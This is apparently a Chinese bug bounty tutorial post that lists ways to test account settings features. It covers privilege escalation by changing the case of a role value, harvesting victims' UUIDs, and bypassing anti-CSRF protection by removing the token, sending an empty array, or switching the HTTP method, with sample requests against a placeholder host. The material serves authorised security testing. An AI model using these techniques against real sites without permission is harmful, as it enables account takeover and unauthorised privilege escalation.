漏洞赏金猎人系列-如何测试设置(Setting)功能III

admin

102205
文章

87
评论

2022年11月10日14:58:01评论40 views字数 1970阅读6分34秒阅读模式

漏洞赏金猎人系列-如何测试设置(Setting)功能III

声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

正文

本文为本系列的第三弹,前篇有:

漏洞赏金猎人系列-如何测试设置(Setting)功能

漏洞赏金猎人系列-如何测试设置(Setting)功能II

第十五种方法

如果有改变角色的功能,尝试改变大小写,看看能不能绕过权限,比如:

#请求为                                                #响应
PUT /user/changeRole                                   
{"id":"12","Role":"admin"} ------------>       {  "error":"no user permission"      }


PUT /user/changeRole                                   
{"id":"12","Role":"Admin"} ------------>       {  "status":"OK"      }

第十六种方法

如果你想要找到目标的uuid,可以尝试用目标的email或者用户名去注册,响应中可能会包含他们的uuid

第十七种方法

尝试用目标的id去替换uuid,你可能会获取到你想要的uuid

第十八种方法

注意参数或请求头中是否有Anti-CSRF,如果没有请尝试CSRF POC(一般情况想可以利用bp自动生成)

 
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
CSRF-Token: CSRF(注意这需要删除)
Content-Type: application/x-www-form-urlencoded 
Referer: https://previous.com/path
Origin: https://www.company.com 
Content-Length: Number

[email protected]&token=CSRF(注意这里需要删除,在测试的时候)

第十九种方法

尝试删除令牌，确保在修改电子邮件，手机号码或密码时是否有Anti-CSRF来进行验证,如果没有，恭喜你,可能有一个账户劫持在等着你

POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Referer: https://previous.com/path
Origin: https://www.company.com 
Content-Length: Number

[email protected]&token=

第二十种方法

尝试在CSRF令牌参数上提供一个空数组来绕过anti-CSRF实现CSRF

POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Referer: https://previous.com/path
Origin: https://www.company.com 
Content-Length: Number

[email protected]&token[]=

第二十一种方法

改变一下http方法,比如：post可以变为get,put变为post(bp可以进行此操作),同时要删掉Anti-CSRF,可能会发现CSRF

参考

Sometimes, you're just one case away from a crit!
Thanks for this amazing IDOR #BugBountyTip, @JohnH4X00r! pic.twitter.com/bOzHrtfSUv

— INTIGRITI (@intigriti) March 23, 2020

- Put the parameters in the URL instead of POST body (and remove the token) and change the HTTP verb to GET
- Testing every sensitive endpoint
- Check whether the token might be guessed / cracked
👇

— hakluke 👨‍💻🚀 (@hakluke) January 17, 2021

https://chinese.freecodecamp.org/news/what-is-cross-site-request-forgery/#:~:text=%E7%89%8C%E6%B7%BB%E5%8A%A0%E4%BF%9D%E6%8A%A4%E3%80%82-,%E4%BD%BF%E7%94%A8Anti%2DCSRF%20%E4%BB%A4%E7%89%8C,%E6%95%B0%EF%BC%8C%E4%B8%94%E4%B8%8D%E8%83%BD%E9%87%8D%E5%A4%8D%E4%BD%BF%E7%94%A8%E3%80%82

https://hackerone.com/reports/6910

https://ad3sh.medium.com/how-i-made-1000-at-t-bug-bounty-h1-14e68b284e2f

原文始发于微信公众号（迪哥讲事）：漏洞赏金猎人系列-如何测试设置(Setting)功能III

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞赏金猎人系列-如何测试设置(Setting)功能III

正文

第十五种方法

第十六种方法

第十七种方法

第十八种方法

第十九种方法

第二十种方法

第二十一种方法

参考

浅谈API漏洞挖掘

滥⽤分叉完成代码注⼊对抗EDR

记一次参数走私导致的权限绕过

高级黑客技术-5. 反向Shell/Shell

第91篇：shiro反序列化漏洞绕waf防护的方法总结（上篇）

hacker10101

主权与信任：网络时代的供应链安全

深入了解DHCP

护网怎么做，护网前、护网中，护网后，总共60道工序，一道一道讲清楚

【论文速读】|大语言模型（LLM）智能体可以自主利用1-day漏洞

发表评论

在线咨询

微信